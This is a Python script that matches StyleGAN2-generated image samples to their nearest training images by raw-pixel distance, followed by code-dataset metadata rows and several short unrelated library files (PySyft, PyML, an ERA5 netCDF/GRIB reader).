dstRootDir_viewSampleSheetImgs = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/LSUN_128_sub30000/fakes004692/view_sampleSheetImgs/'
dstRootDir_NNmatchResult = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/LSUN_128_sub30000/fakes004692/NNmatchResult/'
dstImgName_NNmatchSheet = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/LSUN_128_sub30000/fakes004692/NNmatchResultSheet.png'
dstTxtName_matchDist = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/LSUN_128_sub30000/fakes004692/NNmatchDist.txt'
"""
"""
#### for LSUN_128_sub60000: 60000 images dataset
src_sampleSheetImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/results/results_LSUN_128_sub60000/00000-stylegan2-LSUN_128_sub60000-1gpu-config-f/fakes006497.png'
srcRootDir_originDataImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/datasets_images/LSUN_128_sub60000/'
dstRootDir_viewSampleSheetImgs = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/LSUN_128_sub60000/fakes006497/view_sampleSheetImgs/'
dstRootDir_NNmatchResult = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/LSUN_128_sub60000/fakes006497/NNmatchResult/'
dstImgName_NNmatchSheet = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/LSUN_128_sub60000/fakes006497/NNmatchResultSheet.png'
dstTxtName_matchDist = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/LSUN_128_sub60000/fakes006497/NNmatchDist.txt'
"""
"""
#### for LSUN_128_sub1000_resume: 1000 images dataset
src_sampleSheetImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/results/results_LSUN_128_sub1000_resume/00000-stylegan2-LSUN_128_sub1000-1gpu-config-f/fakes002165.png'
srcRootDir_originDataImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/datasets_images/LSUN_128_sub1000/'
dstRootDir_viewSampleSheetImgs = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/LSUN_128_sub1000_resume/fakes002165/view_sampleSheetImgs/'
dstRootDir_NNmatchResult = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/LSUN_128_sub1000_resume/fakes002165/NNmatchResult/'
dstImgName_NNmatchSheet = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/LSUN_128_sub1000_resume/fakes002165/NNmatchResultSheet.png'
dstTxtName_matchDist = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/LSUN_128_sub1000_resume/fakes002165/NNmatchDist.txt'
"""
"""
#### for LSUN_128_sub5000_resume: 5000 images dataset
src_sampleSheetImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/results/results_LSUN_128_sub5000_resume/00000-stylegan2-LSUN_128_sub5000-1gpu-config-f/fakes000000.png'
srcRootDir_originDataImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/datasets_images/LSUN_128_sub5000/'
dstRootDir_viewSampleSheetImgs = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/LSUN_128_sub5000_resume/fakes000000/view_sampleSheetImgs/'
dstRootDir_NNmatchResult = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/LSUN_128_sub5000_resume/fakes000000/NNmatchResult/'
dstImgName_NNmatchSheet = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/LSUN_128_sub5000_resume/fakes000000/NNmatchResultSheet.png'
dstTxtName_matchDist = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/LSUN_128_sub5000_resume/fakes000000/NNmatchDist.txt'
"""
"""
#### for LSUN_128_sub200: 200 images dataset
src_sampleSheetImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/results/results_LSUN_128_sub200/00000-stylegan2-LSUN_128_sub200-1gpu-config-f/fakes006497.png'
srcRootDir_originDataImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/datasets_images/LSUN_128_sub200/'
dstRootDir_viewSampleSheetImgs = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/LSUN_128_sub200/fakes006497/view_sampleSheetImgs/'
dstRootDir_NNmatchResult = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/LSUN_128_sub200/fakes006497/NNmatchResult/'
dstImgName_NNmatchSheet = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/LSUN_128_sub200/fakes006497/NNmatchResultSheet.png'
dstTxtName_matchDist = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/LSUN_128_sub200/fakes006497/NNmatchDist.txt'
"""
"""
# parameters:
im_size = 128
# note: the sample sheet is of 32x32:
num_row = 32
num_col = 32
"""
### for rebuttal: CIFAR10:
"""
#### for CIFAR10_32_sub1000: 1000 images dataset
src_sampleSheetImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/results/results_CIFAR10_32_sub1000/00000-stylegan2-CIFAR10_32_sub1000-1gpu-config-f/fakes002813.png'
srcRootDir_originDataImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/datasets_images/CIFAR10_32_sub1000/'
dstRootDir_viewSampleSheetImgs = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CIFAR10_32_sub1000/fakes002813/view_sampleSheetImgs/'
dstRootDir_NNmatchResult = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CIFAR10_32_sub1000/fakes002813/NNmatchResult/'
dstImgName_NNmatchSheet = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CIFAR10_32_sub1000/fakes002813/NNmatchResultSheet.png'
dstTxtName_matchDist = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CIFAR10_32_sub1000/fakes002813/NNmatchDist.txt'
"""
"""
#### for CIFAR10_32_sub4000: 4000 images dataset
src_sampleSheetImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/results/results_CIFAR10_32_sub4000/00000-stylegan2-CIFAR10_32_sub4000-1gpu-config-f/fakes003014.png'
srcRootDir_originDataImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/datasets_images/CIFAR10_32_sub4000/'
dstRootDir_viewSampleSheetImgs = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CIFAR10_32_sub4000/fakes003014/view_sampleSheetImgs/'
dstRootDir_NNmatchResult = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CIFAR10_32_sub4000/fakes003014/NNmatchResult/'
dstImgName_NNmatchSheet = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CIFAR10_32_sub4000/fakes003014/NNmatchResultSheet.png'
dstTxtName_matchDist = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CIFAR10_32_sub4000/fakes003014/NNmatchDist.txt'
"""
"""
#### for CIFAR10_32_sub8000: 8000 images dataset
src_sampleSheetImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/results/results_CIFAR10_32_sub8000/00000-stylegan2-CIFAR10_32_sub8000-1gpu-config-f/fakes003014.png'
srcRootDir_originDataImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/datasets_images/CIFAR10_32_sub8000/'
dstRootDir_viewSampleSheetImgs = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CIFAR10_32_sub8000/fakes003014/view_sampleSheetImgs/'
dstRootDir_NNmatchResult = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CIFAR10_32_sub8000/fakes003014/NNmatchResult/'
dstImgName_NNmatchSheet = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CIFAR10_32_sub8000/fakes003014/NNmatchResultSheet.png'
dstTxtName_matchDist = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CIFAR10_32_sub8000/fakes003014/NNmatchDist.txt'
"""
"""
#### for CIFAR10_32_sub10000: 10000 images dataset
src_sampleSheetImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/results/results_CIFAR10_32_sub10000/00000-stylegan2-CIFAR10_32_sub10000-1gpu-config-f/fakes002009.png'
srcRootDir_originDataImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/datasets_images/CIFAR10_32_sub10000/'
dstRootDir_viewSampleSheetImgs = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CIFAR10_32_sub10000/fakes002009/view_sampleSheetImgs/'
dstRootDir_NNmatchResult = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CIFAR10_32_sub10000/fakes002009/NNmatchResult/'
dstImgName_NNmatchSheet = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CIFAR10_32_sub10000/fakes002009/NNmatchResultSheet.png'
dstTxtName_matchDist = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CIFAR10_32_sub10000/fakes002009/NNmatchDist.txt'
"""
"""
# parameters: for CIFAR10:
im_size = 32
# note: the sample sheet is of 32x32:
num_row = 32
num_col = 32
"""
### for rebuttal: image size 256x256:
"""
#### for FLOWER_256_sub1000: 1000 images dataset
src_sampleSheetImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/results/results_FLOWER_256_sub1000/00002-stylegan2-FLOWER_256_sub1000-1gpu-config-f/fakes004435.png'
srcRootDir_originDataImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/datasets_images/FLOWER_256_sub1000/'
dstRootDir_viewSampleSheetImgs = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_256_sub1000/fakes004435/view_sampleSheetImgs/'
dstRootDir_NNmatchResult = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_256_sub1000/fakes004435/NNmatchResult/'
dstImgName_NNmatchSheet = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_256_sub1000/fakes004435/NNmatchResultSheet.png'
dstTxtName_matchDist = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_256_sub1000/fakes004435/NNmatchDist.txt'
"""
"""
#### for FLOWER_256_sub4000: 4000 images dataset
src_sampleSheetImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/results/results_FLOWER_256_sub4000/00002-stylegan2-FLOWER_256_sub4000-1gpu-config-f/fakes006128.png'
srcRootDir_originDataImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/datasets_images/FLOWER_256_sub4000/'
dstRootDir_viewSampleSheetImgs = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_256_sub4000/fakes006128/view_sampleSheetImgs/'
dstRootDir_NNmatchResult = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_256_sub4000/fakes006128/NNmatchResult/'
dstImgName_NNmatchSheet = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_256_sub4000/fakes006128/NNmatchResultSheet.png'
dstTxtName_matchDist = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_256_sub4000/fakes006128/NNmatchDist.txt'
"""
"""
#### for FLOWER_256_sub6000: 6000 images dataset
src_sampleSheetImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/results/results_FLOWER_256_sub6000/00002-stylegan2-FLOWER_256_sub6000-1gpu-config-f/fakes006290.png'
srcRootDir_originDataImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/datasets_images/FLOWER_256_sub6000/'
dstRootDir_viewSampleSheetImgs = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_256_sub6000/fakes006290/view_sampleSheetImgs/'
dstRootDir_NNmatchResult = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_256_sub6000/fakes006290/NNmatchResult/'
dstImgName_NNmatchSheet = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_256_sub6000/fakes006290/NNmatchResultSheet.png'
dstTxtName_matchDist = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_256_sub6000/fakes006290/NNmatchDist.txt'
"""
#"""
#### for FLOWER_256: 8189 images dataset
src_sampleSheetImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/results/results_FLOWER_256/00002-stylegan2-FLOWER_256-1gpu-config-f/fakes006209.png'
srcRootDir_originDataImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/datasets_images/FLOWER_256/jpg/'
dstRootDir_viewSampleSheetImgs = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_256/fakes006209/view_sampleSheetImgs/'
dstRootDir_NNmatchResult = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_256/fakes006209/NNmatchResult/'
dstImgName_NNmatchSheet = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_256/fakes006209/NNmatchResultSheet.png'
dstTxtName_matchDist = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_256/fakes006209/NNmatchDist.txt'
#"""
#"""
# parameters: only for 256x256:
im_size = 256
# note: the sample sheet is of 32x32:
num_row = 16
num_col = 30
#"""
# Newly added: only used for MNIST dataset:
# binarize the images!
#biFlag = True # for MNIST dataset
biFlag = False # for other (RGB or grayscale) dataset
def dealWith_sampleSheet():
sampleSheet_img = cv2.imread(src_sampleSheetImg)
(sheet_img_height, sheet_img_width, ch) = sampleSheet_img.shape
single_img_height = sheet_img_height//num_row # 128
single_img_width = sheet_img_width//num_col # 128
# a list to store each image in the sampleSheet_img
sample_img_list = []
# split the sampleSheet img into batch_size (here 16) images:
for i in range(num_row):
for j in range(num_col):
start_row_pos = i*single_img_height
end_row_pos = (i+1)*single_img_height
start_col_pos = j*single_img_width
end_col_pos = (j+1)*single_img_width
single_sample_img = sampleSheet_img[start_row_pos:end_row_pos,start_col_pos:end_col_pos,:]
# Newly added:
if biFlag:
single_sample_img_gray = single_sample_img[:,:,0]
_,single_sample_img = cv2.threshold(single_sample_img_gray,127,255,cv2.THRESH_BINARY)
sample_img_list.append(single_sample_img)
return sample_img_list
def image_to_feature_vector(image):
# Note: the image is already resized to a fixed size.
# flatten the image into a list of raw pixel intensities:
return image.flatten()
def generateTrainSet(len_featVec, dim):
all_origin_img_vecs = [] # this is our feature space
all_origin_img_names = []
for (dirpath, dirnames, filenames) in os.walk(srcRootDir_originDataImg):
for filename in filenames:
if ".jpg" in filename or ".png" in filename:
print("------------------deal with---------------------")
print(filename)
origin_img = cv2.imread(srcRootDir_originDataImg+filename)
if biFlag:
origin_img = origin_img[:,:,0]
"""
# NO need to do this here: already 128x128 !
origin_img_centCrop = my_center_crop(origin_img, min(origin_img.shape[0],origin_img.shape[1]))
# resize using linear interpolation:
origin_img_centCrop_resize = cv2.resize(origin_img_centCrop, dim)
"""
# also convert it to feature vector:
origin_img_centCrop_resize_vec = image_to_feature_vector(origin_img)
assert(len(origin_img_centCrop_resize_vec)==len_featVec)
all_origin_img_vecs.append(origin_img_centCrop_resize_vec)
all_origin_img_names.append(filename)
return (np.array(all_origin_img_vecs), all_origin_img_names)
def combine_matchingResult(match_img_list):
# combine the match_img together into a corresponding sheet
(single_img_height, single_img_width, ch) = match_img_list[0].shape
match_img_sheet = np.zeros((single_img_height*num_row,single_img_width*num_col,ch),dtype=np.uint8)
for i in range(num_row):
for j in range(num_col):
start_row_pos = i*single_img_height
end_row_pos = (i+1)*single_img_height
start_col_pos = j*single_img_width
end_col_pos = (j+1)*single_img_width
match_img_idx = i*num_col + j
match_img_sheet[start_row_pos:end_row_pos,start_col_pos:end_col_pos,:] = match_img_list[match_img_idx]
# save this sheet
cv2.imwrite(dstImgName_NNmatchSheet, match_img_sheet)
return
def query_NN_wrapper(sample_img_list):
# this is a wrapper func!
# first, get the training set from original images:
len_featVec = len(image_to_feature_vector(sample_img_list[0]))
dim = (sample_img_list[0].shape[1],sample_img_list[0].shape[0])
trainSet_feats, all_origin_img_names = generateTrainSet(len_featVec, dim)
neigh = NearestNeighbors(n_neighbors=1) # radius=0.4
neigh.fit(trainSet_feats)
# then, query:
match_img_list = []
match_distance_strs = ''
for i in range(len(sample_img_list)):
single_sample_img = sample_img_list[i]
# get the query vector:
single_sample_img_vec = image_to_feature_vector(single_sample_img)
# NN to search:
match_distance, match_idx = neigh.kneighbors([single_sample_img_vec], 1, return_distance=True)
match_distance = match_distance[0][0]
match_idx = match_idx[0][0]
match_imgName = all_origin_img_names[match_idx]
if biFlag:
match_img = trainSet_feats[match_idx,:].reshape((dim[1],dim[0],1))
else:
match_img = trainSet_feats[match_idx,:].reshape((dim[1],dim[0],3))
match_img_list.append(match_img)
# save the matching result:
im_h = cv2.hconcat([single_sample_img, match_img])
cv2.imwrite(dstRootDir_NNmatchResult+str(i+1)+'_'+match_imgName, im_h)
# newly added: also save the corresponding match_distance into txt file:
match_distance_strs += str(i+1)+'_'+match_imgName + ': match_distance = ' + str(match_distance) + '\n'
# also combine the match_img together into a corresponding sheet!
combine_matchingResult(match_img_list)
# newly added: also save the corresponding match_distance into txt file:
f = open(dstTxtName_matchDist, 'w')
f.write(match_distance_strs)
f.close()
return
if __name__ == '__main__':
# first, deal with the sample sheet:
sample_img_list = dealWith_sampleSheet()
#"""
# for debug: save the generated sample images to visualize:
for i in range(len(sample_img_list)):
single_sample_img = sample_img_list[i]
cv2.imwrite(dstRootDir_viewSampleSheetImgs+str(i+1)+'.png', single_sample_img)
#"""
# finally, query each single_sample_img into original dataset (FLOWER_128_xxx here);
# also, save the matching results:
query_NN_wrapper(sample_img_list)
| 64.793169
| 192
| 0.815088
| 4,345
| 34,146
| 6.129114
| 0.075489
| 0.060493
| 0.114265
| 0.154594
| 0.82618
| 0.792047
| 0.787128
| 0.782622
| 0.777703
| 0.765724
| 0
| 0.118272
| 0.079863
| 34,146
| 526
| 193
| 64.91635
| 0.729336
| 0.060563
| 0
| 0.216495
| 0
| 0.051546
| 0.118371
| 0.110226
| 0
| 0
| 0
| 0
| 0.010309
| 1
| 0.051546
| false
| 0
| 0.041237
| 0.010309
| 0.14433
| 0.020619
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
7332bebccb309a9f8e8be9bb2faac99f22225132
| 115
|
py
|
Python
|
syft/frameworks/torch/fl/__init__.py
|
Rishav1/PySyft
|
f620ee12727b52b19a317f263789830b57ee2539
|
[
"Apache-2.0"
] | 2
|
2019-05-29T13:09:02.000Z
|
2019-06-14T17:40:51.000Z
|
syft/frameworks/torch/federated/__init__.py
|
mukira/PySyft
|
94595008e8326d3111406ae143099b311fc3f2e6
|
[
"Apache-2.0"
] | 3
|
2019-05-24T01:16:56.000Z
|
2019-09-18T13:02:30.000Z
|
syft/frameworks/torch/federated/__init__.py
|
mukira/PySyft
|
94595008e8326d3111406ae143099b311fc3f2e6
|
[
"Apache-2.0"
] | 1
|
2022-03-12T08:04:34.000Z
|
2022-03-12T08:04:34.000Z
|
from .dataset import BaseDataset
from .dataset import FederatedDataset
from .dataloader import FederatedDataLoader
| 28.75
| 43
| 0.869565
| 12
| 115
| 8.333333
| 0.583333
| 0.22
| 0.34
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.104348
| 115
| 3
| 44
| 38.333333
| 0.970874
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
7dfbcacae2138ffdbf116e2370cff42e7ca663b0
| 36
|
py
|
Python
|
PyML/utils/__init__.py
|
ArjixWasTaken/PyML
|
1a72a8e95e32520826c8c8cb564cb675911cbe5e
|
[
"MIT"
] | 10
|
2021-11-19T21:53:00.000Z
|
2022-03-05T14:53:50.000Z
|
PyML/utils/__init__.py
|
ArjixWasTaken/PyML
|
1a72a8e95e32520826c8c8cb564cb675911cbe5e
|
[
"MIT"
] | null | null | null |
PyML/utils/__init__.py
|
ArjixWasTaken/PyML
|
1a72a8e95e32520826c8c8cb564cb675911cbe5e
|
[
"MIT"
] | 1
|
2021-11-21T10:20:42.000Z
|
2021-11-21T10:20:42.000Z
|
from PyML.utils.table import Table
| 18
| 35
| 0.805556
| 6
| 36
| 4.833333
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.138889
| 36
| 1
| 36
| 36
| 0.935484
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
b401ff42dd8ae44f656bddedeb74021da37e07ff
| 33
|
py
|
Python
|
src/qrcode/pyqart/qr/ec/__init__.py
|
lapinozz/ArtCoder
|
a1bf769dc58d157395c1d139b54baba64b012297
|
[
"MIT"
] | 525
|
2016-08-01T00:37:00.000Z
|
2022-03-24T14:25:04.000Z
|
src/qrcode/pyqart/qr/ec/__init__.py
|
lapinozz/ArtCoder
|
a1bf769dc58d157395c1d139b54baba64b012297
|
[
"MIT"
] | 5
|
2016-08-08T07:12:05.000Z
|
2022-03-28T04:15:53.000Z
|
src/qrcode/pyqart/qr/ec/__init__.py
|
lapinozz/ArtCoder
|
a1bf769dc58d157395c1d139b54baba64b012297
|
[
"MIT"
] | 69
|
2016-08-01T01:09:47.000Z
|
2022-03-24T14:25:04.000Z
|
from .rsencoder import RSEncoder
| 16.5
| 32
| 0.848485
| 4
| 33
| 7
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.121212
| 33
| 1
| 33
| 33
| 0.965517
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
b43767663d85c442559c7d6fb1163b132a95c9b1
| 6,932
|
py
|
Python
|
src/ecmwf_models/era5/interface.py
|
wpreimes/ecmwf_models
|
574a22779753e835c9d79f63345ac505286da8fb
|
[
"MIT"
] | null | null | null |
src/ecmwf_models/era5/interface.py
|
wpreimes/ecmwf_models
|
574a22779753e835c9d79f63345ac505286da8fb
|
[
"MIT"
] | null | null | null |
src/ecmwf_models/era5/interface.py
|
wpreimes/ecmwf_models
|
574a22779753e835c9d79f63345ac505286da8fb
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
This module contains ERA5/ERA5-Land specific child classes of the netcdf
and grib base classes, that are used for reading all ecmwf products.
"""
from ecmwf_models.interface import ERANcImg, ERANcDs, ERAGrbImg, ERAGrbDs
from typing import Tuple, Optional
from typing_extensions import Literal
from pygeogrids.grids import CellGrid
# ERA5 products supported by the reader.
_supported_products = ['era5', 'era5-land']
def _assert_product(product: str) -> str:
if product not in _supported_products:
raise ValueError(f"Got product {product} but expected one of "
f"{_supported_products}")
return product
class ERA5NcImg(ERANcImg):
def __init__(self,
filename: str,
parameter: Optional[Tuple[str, ...]] = ("swvl1", "swvl2"),
product: Literal['era5', 'era5-land'] = 'era5',
subgrid: Optional[CellGrid] = None,
mask_seapoints: Optional[bool] = False,
array_1D: Optional[bool] = False,
):
"""
Reader for a single ERA5 netcdf image file.
Parameters
----------
filename: str
Path to the image file to read.
parameter: list or str, optional (default: ['swvl1', 'swvl2'])
Name of parameters to read from the image file.
product: str, optional (default: 'era5')
What era5 product, either era5 or era5-land.
subgrid: pygeogrids.CellGrid, optional (default: None)
Read only data for points of this grid and not global values.
mask_seapoints : bool, optional (default: False)
Read the land-sea mask to mask points over water and
set them to nan. This option needs the 'lsm' parameter to be
in the file!
array_1D: bool, optional (default: False)
Read data as list, instead of 2D array, used for reshuffling.
"""
super(ERA5NcImg, self).__init__(
filename=filename,
product=_assert_product(product),
parameter=parameter,
subgrid=subgrid,
mask_seapoints=mask_seapoints,
array_1D=array_1D,
)
class ERA5NcDs(ERANcDs):
"""
Reader for a stack of ERA5 netcdf image files.
Parameters
----------
root_path: str
Path to the image files to read.
parameter: list or str, optional (default: ('swvl1', 'swvl2'))
Name of parameters to read from the image file.
product: str, optional (default: 'era5')
What era5 product, either era5 or era5-land.
h_steps : list, optional (default: (0,6,12,18))
List of full hours to read images for.
subgrid: pygeogrids.CellGrid, optional (default: None)
Read only data for points of this grid and not global values.
mask_seapoints : bool, optional (default: False)
Read the land-sea mask to mask points over water and set them to nan.
This option needs the 'lsm' parameter to be in the file!
array_1D: bool, optional (default: False)
Read data as list, instead of 2D array, used for reshuffling.
"""
def __init__(
self,
root_path: str,
parameter: Tuple[str, ...] = ("swvl1", "swvl2"),
product: Literal['era5', 'era5-land'] = 'era5',
h_steps: Tuple[int, ...] = (0, 6, 12, 18),
subgrid: Optional[CellGrid] = None,
mask_seapoints: Optional[bool] = False,
array_1D: Optional[bool] = False,
):
super(ERA5NcDs, self).__init__(
root_path=root_path,
product=_assert_product(product),
parameter=parameter,
subgrid=subgrid,
h_steps=h_steps,
array_1D=array_1D,
mask_seapoints=mask_seapoints,
)
class ERA5GrbImg(ERAGrbImg):
def __init__(
self,
filename: str,
parameter: Optional[Tuple[str, ...]] = ("swvl1", "swvl2"),
subgrid: Optional[CellGrid] = None,
mask_seapoints: Optional[bool] = False,
array_1D=False,
):
"""
Reader for a single ERA5 grib image file.
Parameters
----------
filename: str
Path to the image file to read.
parameter: list or str, optional (default: ['swvl1', 'swvl2'])
Name of parameters to read from the image file.
subgrid: pygeogrids.CellGrid, optional (default: None)
Read only data for points of this grid and not global values.
mask_seapoints : bool, optional (default: False)
Read the land-sea mask to mask points over water and set
them to nan. This option needs the 'lsm' parameter to be in
the file!
array_1D: bool, optional (default: False)
Read data as list, instead of 2D array, used for reshuffling.
"""
super(ERA5GrbImg, self).__init__(
filename=filename,
product="era5",
parameter=parameter,
subgrid=subgrid,
mask_seapoints=mask_seapoints,
array_1D=array_1D,
)
class ERA5GrbDs(ERAGrbDs):
def __init__(
self,
root_path: str,
parameter: Tuple[str, ...] = ("swvl1", "swvl2"),
h_steps: Tuple[int, ...] = (0, 6, 12, 18),
product: Literal['era5', 'era5-land'] = "era5",
subgrid: Optional[CellGrid] = None,
mask_seapoints: Optional[bool] = False,
array_1D: Optional[bool] = False,
):
"""
Reader for a stack of ERA5 grib image file.
Parameters
----------
root_path: str
Path to the image files to read.
parameter: list or str, optional (default: ['swvl1', 'swvl2'])
Name of parameters to read from the image file.
h_steps : list, optional (default: [0,6,12,18])
List of full hours to read images for.
product: str, optional (default: 'era5')
What era5 product, either era5 or era5-land.
subgrid: pygeogrids.CellGrid, optional (default: None)
Read only data for points of this grid and not global values.
mask_seapoints : bool, optional (default: False)
Read the land-sea mask to mask points over water and set them
to nan. This option needs the 'lsm' parameter to be in the file!
array_1D: bool, optional (default: False)
Read data as list, instead of 2D array, used for reshuffling.
"""
super(ERA5GrbDs, self).__init__(
root_path=root_path,
product=_assert_product(product),
parameter=parameter,
subgrid=subgrid,
h_steps=h_steps,
mask_seapoints=mask_seapoints,
array_1D=array_1D,
)
| 36.87234
| 77
| 0.585834
| 816
| 6,932
| 4.859069
| 0.154412
| 0.079445
| 0.038335
| 0.048424
| 0.831274
| 0.813115
| 0.796217
| 0.796217
| 0.769231
| 0.769231
| 0
| 0.021249
| 0.321119
| 6,932
| 187
| 78
| 37.069519
| 0.821292
| 0.468552
| 0
| 0.690476
| 0
| 0
| 0.054337
| 0.006673
| 0
| 0
| 0
| 0
| 0.047619
| 1
| 0.059524
| false
| 0
| 0.047619
| 0
| 0.166667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
b47bf6ed3cb1d7d33d6817359f648466e679806a
| 8,252
|
py
|
Python
|
encode_quantification/preprocess.py
|
LRGASP/lrgasp-challenge-2-evaluation
|
a658b76b9f1356bf3786b75522b28464cdde8a2b
|
[
"MIT"
] | 1
|
2021-07-13T18:35:00.000Z
|
2021-07-13T18:35:00.000Z
|
